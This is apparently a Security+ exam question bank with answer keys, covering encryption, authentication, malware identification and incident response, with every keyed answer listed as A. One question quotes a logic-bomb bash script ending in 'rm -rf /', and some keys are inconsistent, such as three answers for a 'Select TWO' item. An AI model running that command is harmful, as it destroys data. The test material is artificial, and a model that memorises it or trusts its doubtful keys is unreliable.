A security analyst reviews the following log entry: 2017-01-13 1622CST 10.11.24.18 93242 148 TCP_HIT 200.200.0.223 _ OBSERVED POST HTTP/1.1.0. "Mozilla 1." www.dropbox.com Financial_Report_2016_CONFID.pdf, 13MB, MS-RTC LM8; .NET CLR 3.0.4509.1392, Jane.Doe Which of the following security issues can the analyst identify? A. Data exfiltration B. Access violation C. Social engineering D. Unencrypted credentials
A. Data exfiltration
A merchant acquirer has the need to store credit card numbers in a transactional database in a high performance environment. Which of the following BEST protects the credit card data? A. Database field encryption B. File-level encryption C. Data loss prevention system D. Full disk encryption
A. Database field encryption
A bank is experiencing a DoS attack against an application designed to handle 500 IP-based sessions. In addition, the perimeter router can only handle 1Gbps of traffic. Which of the following should be implemented to prevent DoS attacks in the future? A. Deploy multiple web servers and implement a load balancer. B. Increase the capacity of the perimeter router to 10Gbps. C. Implement a forwarding proxy and URL filtering for the organization's applications. D. Implement an active/passive high availability solution.
A. Deploy multiple web servers and implement a load balancer.
Which of the following controls allows a security guard to perform a post-incident review? A. Detective B. Preventive C. Technical D. Deterrent
A. Detective
A security analyst is reviewing the password policy for a service account that is used for a critical network service. The password policy for this account is as follows: Enforce password history: 3 passwords remembered Maximum password age: 30 days Minimum password age: 0 days Complexity requirements: At least 1 special character, 1 uppercase Minimum password length: 7 characters Lockout duration: 1 day Lockout threshold: 5 failed attempts in 15 minutes Which of the following adjustments would be MOST appropriate for the service account? A. Disable account lockouts. B. Set the maximum password age to 15 days C. Set the minimum password age to seven days D. Increase password length to 18 characters
A. Disable account lockouts.
An auditor's report discovered several accounts with no activity for over 60 days. The accounts were later identified as contractors' accounts who would be returning in three months and would need to resume the activities. Which of the following would mitigate and secure the auditors finding? A. Disable unnecessary contractor accounts and inform the auditor of the update. B. Reset contractor accounts and inform the auditor of the update. C. Inform the auditor that the accounts belong to the contractors. D. Delete contractor accounts and inform the auditor of the update.
A. Disable unnecessary contractor accounts and inform the auditor of the update.
Several bins are located throughout a building for secure disposal of sensitive information. Which of the following does this prevent? A. Dumpster diving B. War driving C. Tailgating D. War chalking
A. Dumpster diving
A security administrator is developing controls for creating audit trails and tracking if a PHI data breach is to occur. The administrator has been given the following requirements: *All access must be correlated to a user account. *All user accounts must be assigned to a single individual. *User access to the PHI data must be recorded. *Anomalies in PHI data access must be reported. *Logs and records cannot be deleted or modified. Which of the following should the administrator implement to meet the above requirements? (Select THREE). A. Eliminate shared accounts. B. Create a standard naming convention for accounts. C. Implement usage auditing and review. D. Enable account lockout thresholds. E. Copy logs in real time to a secured WORM drive. F. Implement time-of-day restrictions. G. Perform regular permission audits and reviews.
A. Eliminate shared accounts. C. Implement usage auditing and review. E. Copy logs in real time to a secured WORM drive.
Which of the following components of printers and MFDs are MOST likely to be used as vectors of compromise if they are improperly configured? A. Embedded web server B. Spooler C. Network interface D. LCD control panel
A. Embedded web server
A security analyst is emailing PII in a spreadsheet file to an audit validator for after-actions related to a security assessment. The analyst must make sure the PII data is protected with the following minimum requirements: Ensure confidentiality at rest. Ensure the integrity of the original email message. Which of the following controls would ensure these data security requirements are carried out? A. Encrypt and sign the email using S/MIME. B. Encrypt the email and send it using TLS. C. Hash the email using SHA-1. D. Sign the email using MD5.
A. Encrypt and sign the email using S/MIME.
A company has been experiencing many successful email phishing attacks, which have been resulting in the compromise of multiple employees' accounts when employees reply with their credentials. The security administrator has been notifying each user and resetting the account passwords when accounts become compromised. Regardless of this process, the same accounts continue to be compromised even when the users do not respond to the phishing attacks. Which of the following are MOST likely to prevent similar account compromises? (Select TWO). A. Enforce password reuse limitations. B. Enable password complexity. C. Reset the account security questions. D. Configure account lockout. E. Implement time-of-day restrictions.
A. Enforce password reuse limitations. C. Reset the account security questions.
Which of the following BEST implements control diversity to reduce the risks associated with the authentication of employees into company resources? A. Enforcing the use of something you know and something you have for authentication B. Requiring employees to sign the company's password and acceptable use policies C. Implementing LDAP authentication for some systems and RADIUS authentication for others D. Publishing a password policy and enforcing password requirements via a GPO
A. Enforcing the use of something you know and something you have for authentication
Which of the following is an application security coding problem? A. Error and exception handling B. Patch management C. Application hardening D. Application fuzzing
A. Error and exception handling
A company stores highly sensitive data files used by the accounting system on a server file share. The accounting system uses a service account named accounting-svc to access the file share. The data is protected will full disk encryption, and the permissions are set as follows: File system permissions: Users = Read Only Share permission: accounting-svc = Read Only Given the listed protections are in place and unchanged, to which of the following risks is the data still subject? A. Exploitation of local console access and removal of data B. Theft of physical hard drives and a breach of confidentiality C. Remote exfiltration of data using domain credentials D. Disclosure of sensitive data to third parties due to excessive share permissions
A. Exploitation of local console access and removal of data
Which of the following fire suppression systems is MOST likely used in a datacenter? A. FM-200 B. Dry-pipe C. Wet-pipe D. Vacuum
A. FM-200
Which of the following occurs when a vulnerability scan fails to identify a existing vulnerability? A. False negative B. False positive C. True positive D. True negative
A. False negative
This security tool is best for checking to see if specific system files have been changed and report on those changes. A. File integrity checker B. HIDS / HIPS C. Application whitelisting D. DLP
A. File integrity checker
Which of the following implements a stream cipher? A. File-level encryption B. IKEv2 exchange C. SFTP data transfer D. S/MIME encryption
A. File-level encryption
Which of the following devices would MOST likely have a DMZ interface? A. Firewall B. Switch C. Load balancer D. Proxy
A. Firewall
Which of the following controls can be implemented together to prevent data loss in the event of theft of a mobile device storing sensitive information? (Select TWO). A. Full device encryption B. Screen locks C. GPS D. Asset tracking E. Inventory contro
A. Full device encryption B. Screen locks
A way to assure data at-rest is secure even in the event of loss or theft is to use: A. Full device encryption. B. Special permissions on the file system. C. Trusted Platform Module integration. D. Access Control Lists.
A. Full device encryption.
Which of the following allows an auditor to test proprietary-software compiled code for security flaws? A. Fuzzing B. Static review C. Code signing D. Regression testing
A. Fuzzing
Which of the following application security testing techniques is implemented when an automated system generates random input data? A. Fuzzing B. XSRF C. Hardening D. Input validation
A. Fuzzing
A company, wants to ensure users are only logging into the system from their laptops when they are on site. Which of the following would assist with this? A. Geofencing B. Smart cards C. Biometrics D. Tokens
A. Geofencing
Pete, a developer, writes an application. Jane, the security analyst, knows some things about the overall application but does not have all the details. Jane needs to review the software before it is released to production. Which of the following reviews should Jane conduct? A. Gray Box Testing B. Black Box Testing C. Business Impact Analysis D. White Box Testing
A. Gray Box Testing
A new intern was assigned to the system engineering department, which consists of the system architect and system software developer's teams. These two teams have separate privileges. The intern requires privileges to view the system architectural drawings and comment on some software development projects. Which of the following methods should the system administrator implement? A. Group based privileges B. Generic account prohibition C. User access review D. Credential management
A. Group based privileges
Jane, a security administrator, has observed repeated attempts to break into a server. Which of the following is designed to stop an intrusion on a specific server? A. HIPS B. NIDS C. HIDS D. NIPS
A. HIPS
Which of the following devices is BEST suited for servers that need to store private keys? A. Hardware security module B. Hardened network firewall C. Solid state disk drive D. Hardened host firewall
A. Hardware security module
After a series of breaches, a network administrator identified that staff recorded complex passwords in writing. The network administrator is adding multifactor authenticaton to the system. Which of the following should the administrator implement? A. Hardware token B. User PIN C. Image patterns D. Security questions
A. Hardware token
Which of the following functions provides an output which cannot be reversed and converts data into a string of characters? A. Hashing B. Stream ciphers C. Steganography D. Block ciphers
A. Hashing
Which international standard is used for Network Access Control? A. IEEE 802.1X B. IEEE 802.11 C. ISO 27001 D. GDPR
A. IEEE 802.1X
Configuring the mode, encryption methods, and security associations are part of which of the following? A. IPSec B. Full disk encryption C. 802.1x D. PKI
A. IPSec
A network engineer is designing a secure tunneled VPN. Which of the following protocols would be the MOST secure? A. IPsec B. SFTP C. BGP D. PPTP
A. IPsec
A company has decided to move large data sets to a cloud provider in order to limit the costs of new infrastructure. Some of the data is sensitive and the Chief Information Officer wants to make sure both parties have a clear understanding of the controls needed to protect the data. Which of the following types of interoperability agreement is this? A. ISA B. MOU C. SLA D. BPA
A. ISA
A company is performing an analysis of the corporate enterprise network with the intent of identifying any one system, person, function, or service that, when neutralized, will cause or cascade disproportionate damage to the company's revenue, referrals, and reputation. Which of the following is an element of the BIA that this action is addressing? A. Identification of critical systems B. Single point of failure C. Value assessment D. Risk register
A. Identification of critical systems
Which of the following is the proper order for logging a user into a system from the first step to the last step? A. Identification, authentication, authorization B. Identification, authorization, authentication C. Authentication, identification, authorization D. Authentication, identification, authorization E. Authorization, identification, authentication
A. Identification, authentication, authorization
A computer emergency response team is called at midnight to investigate a case in which a mail server was restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active connection. Which of the following is the NEXT step the team should take? A. Identify the source of the active connection B. Perform eradication of active connection and recover C. Performance containment procedure by disconnecting the server D. Format the server and restore its initial configuration
A. Identify the source of the active connection
A company offers SaaS, maintaining all customers' credentials and authenticating locally. Many large customers have requested the company offer some form of federation with their existing authentication infrastructures. Which of the following would allow customers to manage authentication and authorizations from within their existing organizations? A. Implement SAML so the company's services may accept assertions from the customers' authentication servers. B. Provide customers with a constrained interface to manage only their users' accounts in the company's active directory server. C. Provide a system for customers to replicate their users' passwords from their authentication service to the company's. D. Use SOAP calls to support authentication between the company's product and the customers' authentication servers.
A. Implement SAML so the company's services may accept assertions from the customers' authentication servers.
Which of the following allows Pete, a security technician, to provide the MOST secure wireless implementation? A. Implement WPA B. Disable SSID C. Adjust antenna placement D. Implement WEP
A. Implement WPA
A security administrator is performing a risk assessment on a legacy WAP with a WEP-enabled wireless infrastructure. Which of the following should be implemented to harden the infrastructure without upgrading the WAP? A. Implement WPA and TKIP. B. Implement WPS and an eight-digit pin. C. Implement WEP and RC4. D. Implement WPA2 Enterprise.
A. Implement WPA and TKIP.
A security analyst is securing smartphones and laptops for a highly mobile workforce. Priorities include: Remote wipe capabilities Geolocation services Patch management and reporting Mandatory screen locks Ability to require passcodes and pins Ability to require encryption Which of the following would BEST meet these requirements? A. Implementing MDM software B. Deploying relevant group policies to the devices C. Installing full device encryption D. Removing administrative rights to the devices
A. Implementing MDM software
In this type of vulnerability, accounts have greater privileges than is needed to perform a function and is solved by Least Privilege? A. Improperly configured accounts B. Resource exhaustion C. Improper input handling D. Race condition
A. Improperly configured accounts
After a number of highly publicized and embarrassing customer data leaks as a result of social engineering attacks by phone, the Chief Information Officer (CIO) has decided user training will reduce the risk of another data leak. Which of the following would be MOST effective in reducing data leaks in this situation? A. Information Security Awareness B. Social Media and BYOD C. Data Handling and Disposal D. Acceptable Use of IT Systems
A. Information Security Awareness
An application was recently compromised after some malformed data came in via web form. Which of the following would MOST likely have prevented this? A. Input validation B. Proxy server C. Stress testing D. Encoding
A. Input validation
Which of the following can BEST help prevent cross-site scripting attacks and buffer overflows on a production system? A. Input validation B. Network intrusion detection system C. Anomaly-based HIDS D. Peer review
A. Input validation
Corporations choose to exceed regulatory framework standards because of which of the following incentives? A. It improves the legal defensibility of the company B. It gives a social defense that the company is not violating customer privacy laws C. It proves to investors that the company takes APT cyber actors seriously D. It results in overall industrial security standards being raised voluntarily
A. It improves the legal defensibility of the company
In regards to secure coding practices, why is input validation important? A. It mitigates buffer overflow attacks. B. It makes the code more readable. C. It provides an application configuration baseline. D. It meets gray box testing standards.
A. It mitigates buffer overflow attacks.
Jane, a security administrator, has been tasked with explaining authentication services to the company's management team. The company runs an active directory infrastructure. Which of the following solutions BEST relates to the host authentication protocol within the company's environment? A. Kerberos B. Least privilege C. TACACS+ D. LDAP
A. Kerberos
Which of the following types of authentication packages user credentials in a ticket? A. Kerberos B. LDAP C. TACACS+ D. RADIUS
A. Kerberos
A systems administrator found a suspicious file in the root of the file system. The file contains URLs, usernames, passwords, and text from other documents being edited on the system. Which of the following types of malware would generate such a file? A. Keylogger B. Rootkit C. Bot D. RAT
A. Keylogger
A network technician is trying to set up a secure method for managing users and groups across the enterprise. Which of the following protocols is MOST likely to be used? A. LDAPS B. SFTP C. NTLM D. SNMPv3
A. LDAPS
A security technician has been given the task of preserving emails that are potentially involved in a dispute between a company and a contractor. Which of the following BEST describes this forensic concept? A. Legal hold B. Chain of custody C. Order of volatility D. Data acquistion
A. Legal hold
After a security incident, management is meeting with involved employees to document the incident and its aftermath. Which of the following BEST describes this phase of the incident response process? A. Lessons learned B. Recovery C. Identification D. Preparation
A. Lessons learned
Following the successful response to a data-leakage incident, the incident team lead facilitates an exercise that focuses on continuous improvement of the organization's incident response capabilities. Which of the following activities has the incident team lead executed? A. Lessons learned review B. Root cause analysis C. Incident audit D. Corrective action exercise
A. Lessons learned review
An information security specialist is reviewing the following output from a Linux server: user@server:~$ -l 5 * * * * /usr/local/bin.backup.sh user@server:~$ cat /usr/local/bin/backup.sh #!/bin/bash if ! grep --quiet joeuser /etc/passwd the rm -rf / fi Based on the above information, which of the following types of malware was installed on the server? A. Logic bomb B. Trojan C. Backdoor D. Ransomware E. Rootkit
A. Logic bomb
Which of the following presents the STRONGEST access control? A. MAC B. TACACS C. DAC D. RBAC
A. MAC
Which of the following means of wireless authentication is easily vulnerable to spoofing? A. MAC Filtering B. WPA - LEAP C. WPA - PEAP D. Enabled SSID
A. MAC Filtering
An incident involving a workstation that is potentially infected with a virus has occurred. The workstation may have sent confidential data to an unknown internet server. Which of the following should a security analyst do FIRST? A. Make a copy of everything in memory on the workstation. B. Turn off the workstation. C. Consult the information security policy. D. Run a virus scan.
A. Make a copy of everything in memory on the workstation.
Which of the following would be MOST effective in reducing tailgating incidents? A. Mantrap B. Faraday cage C. Motion detection D. Bollards
A. Mantrap
A company is performing an analysis of the corporate enterprise network with the intent of identifying what will cause losses in revenue, referrals, and/or reputation when out of commission. Which of the following is an element of a BIA that is being addressed? A. Mission-essential function B. Single point of failure C. backup and restoration plans D. Identification of critical systems
A. Mission-essential function
Which of the following types of encryption will help in protecting files on a PED? A. Mobile device encryption B. Transport layer encryption C. Encrypted hidden container D. Database encryption
A. Mobile device encryption
A company recently experienced data exfiltration via the corporate network. In response to the breach, a security analyst recommends deploying an out-of-band IDS solution. The analyst says the solution can be implemented without purchasing any additional network hardware. Which of the following solutions will be used to deploy the IDS? A. Network tap B. Network proxy C. Honeypot D. Port mirroring
A. Network tap
Which of the following strategies helps reduce risk if a rollback is needed when upgrading a critical system platform? A. Non-persistent configuration B. Continuous monitoring C. Firmware updates D. Fault tolerance
A. Non-persistent configuration
A user needs to send sensitive information to a colleague using PKI. Which of the following concepts apply when a sender encrypts the message hash with the sender's private key? (Select TWO) A. Non-repudiation B. Email content encryption C. Steganography D. Transport security E. Message integrity
A. Non-repudiation E. Message integrity
After a recent internal breach, a company decided to regenerate and reissue all certificates used in the transmission of confidential information. The company places the greatest importance on confidentiality and non-repudiation, and decided to generate dual key pairs for each client. Which of the following BEST describes how the company will use these certificates? A. One key pair will be used for encryption and decryption. The other will be used to digitally sign the data. B. One key pair will be used for encryption. The other key pair will provide extended validation. C. Data will be encrypted once by each key, doubling the confidentiality and non-repudiation strength. D. One key pair will be used for internal communication, and the other will be used for external communication.
A. One key pair will be used for encryption and decryption. The other will be used to digitally sign the data.
An organization wants to utilize a common, Internet-based third-party provider for authorization and authentication. The provider uses a technology based on OAuth 2.0 to provide required services. To which of the following technologies is the provider referring? A. OpenID Connect B. SAML C. XACML D. LDAP
A. OpenID Connect
Sara, the security administrator, must configure the corporate firewall to allow all public IP addresses on the internal interface of the firewall to be translated to one public IP address on the external interface of the same firewall. Which of the following should Sara configure? A. PAT B. NAP C. DNAT D. NAC
A. PAT
A security engineer is asked by the company's development team to recommend the most secure method for password storage. Which of the following provide the BEST protection against brute forcing stored passwords? (Select TWO). A. PBKDF2 B. MD5 C. SHA2 D. Bcrypt E. AES F. CHAP
A. PBKDF2 D. Bcrypt
Which of the following should a security analyst perform FIRST to determine the vulnerabilities of a legacy system? A. Passive scan B. Aggressive scan C. Credentialed scan D. Intrusive scan
A. Passive scan
An auditing team has found that passwords do not meet best business practices. Which of the following will MOST increase the security of the passwords? (Select TWO). A. Password Complexity B. Password Expiration C. Password Age D. Password Length E. Password History
A. Password Complexity D. Password Length
A recent audit has discovered that at the time of password expiration clients are able to recycle the previous credentials for authentication. Which of the following controls should be used together to prevent this from occurring? (Select TWO). A. Password age B. Password hashing C. Password complexity D. Password history E. Password length
A. Password age D. Password history
A hacker has a packet capture that contains: ....Joe Smith........E289F21CD33E4F57890DDEA5CF267ED2.. ...Jane.Doe...........AD1FAB10D33E4F57890DDEA5CF267ED2.. ....John.Key..........3374E9E7E33E4F57890DDEA5CF267ED2.. Which of the following tools will the hacker use against this type of capture? A. Password cracker B. Vulnerability scanner C. DLP scanner D. Fuzzer
A. Password cracker
A security administrator wants to audit the login page of a newly developed web application to determine if default accounts have been disabled. Which of the following is BEST suited to perform this audit? A. Password cracker B. Rainbow table C. Protocol analyzer D. Banner grabbing
A. Password cracker
A Chief Information Officer (CIO) recently saw on the news that a significant security flaws exists with a specific version of a technology the company uses to support many critical application. The CIO wants to know if this reported vulnerability exists in the organization and, if so, to what extent the company could be harmed. Which of the following would BEST provide the needed information? A. Penetration test B. Vulnerability scan C. Active reconnaissance D. Patching assessment report
A. Penetration test
Which of the following penetration testing concepts is an attacker MOST interested in when placing the path of a malicious file in the Windows/ CurrentVersion/ Run registry key? A. Persistence B. Pivoting C. Active reconnaissance D. Escalation of privilege
A. Persistence
Jane, an administrator, needs to make sure the wireless network is not accessible from the parking area of their office. Which of the following would BEST help Jane when deploying a new access point? A. Placement of antenna B. Disabling the SSID C. Implementing WPA2 D. Enabling the MAC filtering
A. Placement of antenna
Joe, a salesman, was assigned to a new project that requires him to travel to a client site. While waiting for a flight, Joe decides to connect to the airport wireless network without connecting to a VPN, and then sends confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon investigation, the company learns Joe's emails were intercepted. Which of the following MOST likely caused the data breach? A. Policy violation B. Social engineering C. Insider threat D. Zero--day attack
A. Policy violation
After a security assessment was performed on the enterprise network, it was discovered that: 1. Configuration changes have been made by users without the consent of IT. 2. Network congestion has increased due to the use of social media. 3. Users are accessing file folders and network shares that are beyond the scope of their need to know. Which of the following BEST describe the vulnerabilities that exist in this environment? (Select TWO) A. Poorly trained users B. Misconfigured WAP settings C. Undocumented assets D. Improperly configured accounts E. Vulnerable business processes
A. Poorly trained users D. Improperly configured accounts
After discovering the \etc\shadow file had been changed, a security administrator noticed an application insecurely creating files in \tmp. Which of the following vulnerabilities has MOST likely been exploited? A. Privilege escalation B. Resource exhaustion C. Memory leak D. Pointer dereference
A. Privilege escalation
An organization employee resigns without giving adequate notice. The following day, it is determined that the employee is still in possession of several company-owned mobile devices. Which of the following could have reduced the risk of this occurring? (Select TWO). A. Proper offboarding procedures B. Acceptable use policies C. Non-disclosure agreements D. Exit interviews E. Background checks F. Separation of duties
A. Proper offboarding procedures D. Exit interviews
Which of the following is BEST used to capture and analyze network traffic between hosts on the same network segment? A. Protocol analyzer B. Router C. Firewall D. HIPS
A. Protocol analyzer
Which of the following would a security administrator implement in order to identify a problem between two systems that are not communicating properly? A. Protocol analyzer B. Baseline report C. Risk assessment D. Vulnerability scan
A. Protocol analyzer
An organization plans to implement multifactor authentication techniques within the enterprise network architecture. Each authentication factor is expected to be a unique control. Which of the following BEST describes the proper employment of multifactor authentication? A. Proximity card, fingerprint scanner, PIN B. Fingerprint scanner, voice recognition, proximity card C. Smart card, user PKI certificate, privileged user certificate D. Voice recognition, smart card, proximity card
A. Proximity card, fingerprint scanner, PIN
Ann, a security administrator, wants to ensure credentials are encrypted in transit when implementing a RADIUS server for SSO. Which of the following are needed given these requirements? (Select TWO) A. Public key B. Shared key C. Elliptic curve D. MD5 E. Private key F. DES
A. Public key E. Private Key
An organization would like to grant access to its wireless network to users who are visiting from another trusted organization by authenticating the visiting users at their home organization. Which of the following is the organization's BEST option? A. RADIUS Federation B. Captive portal C. OCSP D. Certificate chaining
A. RADIUS Federation
University A offers an AAA-based SSO service that allows students to access all wireless and VPN services with the standard university credentials. University A wants to partner with University B to allow its students who are taking classes at University B to sign into either university's wireless network and VPN services with their home university credentials. Which of the following should be implemented to achieve the desired results? A. RADIUS federation B. SAML C. Wildcard certificates D. OAuth 2.0 E. Reverse proxy
A. RADIUS federation
A user downloads and installs an MP3 converter, and runs the application. Upon running the application, the antivirus detects a new port in a listening state. Which of the following has the user MOST likely executed? A. RAT B. Worm C. Ransomware D. Bot
A. RAT
After a user reports slow computer performance, a systems administrator detects a suspicious file, which was installed as part of a freeware software package. The systems administrator reviews the output below: c:\Windows\system32>netstat -nab Active Connections Pronto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0 RpcSs [svchoat.exe] TCP 0.0.0.0:445 0.0.0.0 [svchost.exe] TCP 192.168.1.10:5000 10.37.213.20 winserver.exe UDP 192.168.1.10:1900 *.* SSDPSVR Based on the above information, which of the following types of malware was installed on the user's computer? A. RAT B. Keylogger C. Spyware D. Worm E. Bot
A. RAT
A security auditor is performing a vulnerability scan to find out if mobile applications used in the organization are secure. The auditor discovers that an application has been accessed remotely with no legitimate account credentials. After investigating, it seems that the application has allowed some users to bypass authentication of that application. Which of the following types of malware allow such a compromise to take place? (Select TWO) A. RAT B. Ransomware C. Worm D. Trojan E. Backdoor
A. RAT E. Backdoor
A security administrator must implement a wireless encryption system to secure mobile devices' communication. Some users have mobile devices which only support 56-bit encryption. Which of the following wireless encryption methods should be implemented? A. RC4 B. AES C. MD5 D. TKIP
A. RC4
Ann, a customer, is reporting that several important files are missing from her workstation. She recently received communication from an unknown party who is requesting funds to restore the files. Which of the following attacks has occurred? A. Ransomware B. Keylogger C. Buffer overflow D. Rootkit
A. Ransomware
Some of the legacy systems in an organization are running old versions of the Windows OS and others are running Linux OSs, while new systems are running the latest release of the Windows OS. The systems are not running any legacy custom applications. The organization's Chief Information Officer (CIO) wishes to unify all systems to reduce cost and enhance the security posture of the organization, without losing data or causing data leakage. Which of the following would be the BEST course of action to take? A. Reconfigure all existing machines to have the latest release of Windows OS. B. Restore all machines to default configurations. C. Upgrade part of the legacy systems' infrastructure and perform OS updates. D. Treat all legacy machines as end-of-life systems and replace them.
A. Reconfigure all existing machines to have the latest release of Windows OS.
After a security incident involving a physical asset, which of the following should be done at the beginning? A. Record every person who was in possession of assets, continuing post-incident. B. Create working images of data in the following order: hard drive then RAM. C. Back up storage devices so work can be performed on the devices immediately. D. Write a report detailing the incident and mitigation suggestions.
A. Record every person who was in possession of assets, continuing post-incident.
While working on an incident, Joe, a technician, finished restoring the OS and applications on a workstation from the original media. Joe is about to begin copying the user's files back onto the hard drive. Which of the following incident response steps is Joe working on now? A. Recovery B. Eradication C. Containment D. Identification
A. Recovery
Which of the following allows a company to maintain access to encrypted resources when employee turnover is high? A. Recovery agent B. Certificate authority C. Trust model D. Key escrow
A. Recovery agent
Which of the following BEST describes a network-based attack that can allow an attacker to take full control of a vulnerable host? A. Remote exploit B. Amplification C. Sniffing D. Man-in-the-middle
A. Remote exploit
Which of the following is a compensating control that will BEST reduce the risk of weak passwords? A. Requiring the use of one-time tokens B. Increasing password history retention count C. Disable user accounts after exceeding maximum attempts D. Setting expiration of user passwords to a shorter time
A. Requiring the use of one-time tokens
A computer supply company is located in a building with three wireless networks. The system security team implemented a quarterly security scan and saw the following. SSID State Channel Level Computer AreUs1 connected 1 70dbm Computer AreUs2 connected 5 80dbm Computer AreUs3 connected 3 75dbm Computer AreUs4 connected 6 95dbm Which of the following is this an example of? A. Rogue access point B. Near field communication C. Jamming D. Packet sniffing
A. Rogue access point
Which of the following is used to certify intermediate authorities in a large PKI deployment? A. Root CA B. Recovery agent C. Root user D. Key escrow
A. Root CA
A technician suspects that a system has been compromised. The technician reviews the following log entry: WARNING - hash mismatch: C:\Window\SysWOW64\user32.dll WARNING - hash mismatch: C:\Window\SysWOW64\kernel32.dll Based solely on the above information, which of the following types of malware is MOST likely installed on the system? A. Rootkit B. Ransomware C. Trojan D. Backdoor
A. Rootkit
A security technician is working with the network firewall team to implement access controls at the company's demarc as part of the initiation of configuration management processes. One of the network technicians asks the security technician to explain the access control type found in a firewall. With which of the following should the security technician respond? A. Rule based access control B. Role based access control C. Discretionary access control D. Mandatory access control
A. Rule based access control
A security consultant is setting up a new electronic messaging platform and wants to ensure the platform supports message integrity validation. Which of the following protocols should the consultant recommend? A. S/MIME B. DNSSEC C. RADIUS D. 802.1X
A. S/MIME
A company is executing a strategy to encrypt and sign all proprietary data in transit. The company recently deployed PKI services to support this strategy. Which of the following protocols supports the strategy and employs certificates generated by PKI? (Select THREE). A. S/MIME B. TLS C. SFTP D. SAML E. SIP F. IPSec G. Kerberos
A. S/MIME B. TLS F. IPSec
Which of the following is used to verify data integrity? A. SHA B. 3DES C. AES D. RSA
A. SHA
A company needs to receive data that contains personally identifiable information. The company requires both the transmission and data at rest to be encrypted. Which of the following achieves this goal? (Select TWO). A. SSH B. TFTP C. NTLM D. TKIP E. SMTP F. PGP/GPG
A. SSH F. PGP/GPG
An organization does not want the wireless network name to be easily discovered. Which of the following software features should be configured on the access points? A. SSID broadcast B. MAC filter C. WPA2 D. Antenna placement
A. SSID broadcast
Users are encouraged to click on a link in an email to obtain exclusive access to the newest version of a popular Smartphone. This is an example of. A. Scarcity B. Familiarity C. Intimidation D. Trust
A. Scarcity
Which of the following can a security administrator implement on mobile devices that will help prevent unwanted people from viewing the data if the device is left unattended? A. Screen lock B. Voice encryption C. GPS tracking D. Device encryption
A. Screen lock
Confidential emails from an organization were posted to a website without the organization's knowledge. Upon investigation, it was determined that the emails were obtained from an internal actor who sniffed the emails in plain text. Which of the following protocols, if properly implemented, would have MOST likely prevented the emails from being sniffed? (Select TWO) A. Secure IMAP B. DNSSEC C. S/MIME D. SMTPS E. HTTPS
A. Secure IMAP D. SMTPS
Company A agrees to provide perimeter protection, power, and environmental support with measurable goals for Company B, but will not be responsible for user authentication or patching of operating systems within the perimeter. Which of the following is being described? A. Service level agreement B. Memorandum of understanding C. Business partner agreement D. Interoperability agreement
A. Service level agreement
Human Resources suspects an employee is accessing the employee salary database. The administrator is asked to find out who it is. In order to complete this task, which of the following is a security control that should be in place? A. Shared accounts should be prohibited. B. Account lockout should be enabled C. Privileges should be assigned to groups rather than individuals D. Time of day restrictions should be in use
A. Shared accounts should be prohibited.
A company wants to ensure confidential data from storage media is sanitized in such a way that the drive cannot be reused. Which of the following method should the technician use? A. Shredding B. Wiping C. Low-level formatting D. Repartitioning E. Overwriting
A. Shredding
An office completed digitizing all its paper records. Joe, the data custodian, has been tasked with the disposal of the paper files, which include: Intellectual property Payroll records Financial information Drug screening results Which of the following is the BEST way to dispose of these items? A. Shredding B. Pulping C. Deidentifying D. Recycling
A. Shredding
Employee badges are encoded with a private encryption key and specific personal information. The encoding is then used to provide access to the network. Which of the following describes this access control type? A. Smartcard B. Token C. Discretionary access control D. Mandatory access control
A. Smartcard
A company has developed a business critical system for its core automation process with a software vendor. Which of the following can provide access to the source code if the licensor declares bankruptcy? A. Software escrow B. Software code review C. Software change control D. Software configuration management
A. Software escrow
A security technician at a small business is worried about the Layer 2 switches in the network suffering from a DoS style attack caused by staff incorrectly cabling network connections between switches. Which of the following will BEST mitigate the risk if implemented on the switches? A. Spanning tree B. Flood guards C. Access control lists D. Syn flood
A. Spanning tree
Which of the following tunneling configurations is the process of allowing a remote VPN user to access a public network (the Internet) at the same time that the user is allowed to access organizational resources? A. Split-tunneling B. Inline access C. Always-on VPN D. IPSec VPN
A. Split-tunneling
Which of the following encrypts data a single bit at a time? A. Stream cipher B. Steganography C. 3DES D. Hashing
A. Stream cipher
A small company's Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the company's security posture quickly with regard to targeted attacks. Which of the following should the CSO conduct FIRST? A. Survey threat feeds from services inside the same industry. B. Purchase multiple threat feeds to ensure diversity and implement blocks for malicious traffic. C. Conduct an internal audit against industry best practices to perform a qualitative analysis. D. Deploy a UTM solution that receives frequent updates from a trusted industry vendor.
A. Survey threat feeds from services inside the same industry.
Two users must encrypt and transmit large amounts of data between them. Which of the following should they use to encrypt and transmit the data? A. Symmetric algorithm B. Hash function C. Digital signature D. Obfuscation
A. Symmetric algorithm
An organization is expanding its network team. Currently, it has local accounts on all network devices, but with growth, it wants to move to centrally managed authentication. Which of the following are the BEST solutions for the organization? (Select TWO) A. TACACS+ B. CHAP C. LDAP D. RADIUS E. MSCHAPv2
A. TACACS+ D. RADIUS
An organization has introduced token-based authentication to system administrators due to risk of password compromise. The tokens have a set of numbers that automatically change every 30 seconds. Which of the following type of authentication mechanism is this? A. TOTP B. Smart card C. CHAP D. HOTP
A. TOTP
In the initial stages of an incident response, Matt, the security administrator, was provided the hard drives in QUESTION NO: from the incident manager. Which of the following incident response procedures would he need to perform in order to begin the analysis? (Select TWO). A. Take hashes B. Begin the chain of custody paperwork C. Take screen shots D. Capture the system image E. Decompile suspicious files
A. Take hashes D. Capture the system image E. Decompile suspicious files
Joe, a user, wants to send an encrypted email to Ann. Which of the following will Ann need to use to verify the validity's of Joe's certificate? (Select TWO). A. The CA's public key B. Joe's private key C. Ann's public key D. The CA's private key E. Joe's public key F. Ann's private key
A. The CA's public key E. Joe's public key
A security analyst is updating a BIA document. The security analyst notices the support vendor's time to replace a server hard drive went from eight hours to two hours. Given these new metrics, which of the following can be concluded? (Select TWO) A. The MTTR is faster. B. The MTTR is slower. C. The RTO has increased. D. The RTO has decreased. E. The MTTF has increased. F. The MTTF has decreased.
A. The MTTR is faster. D. The RTO has decreased.
A user typically works remotely over the holidays, using a web-based VPN to access corporate resources. A user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely the cause? A. The certificate expired B. The browser does not support SSL C. The user's account is locked out D. The VPN software has reached the seat license maximum
A. The certificate expired
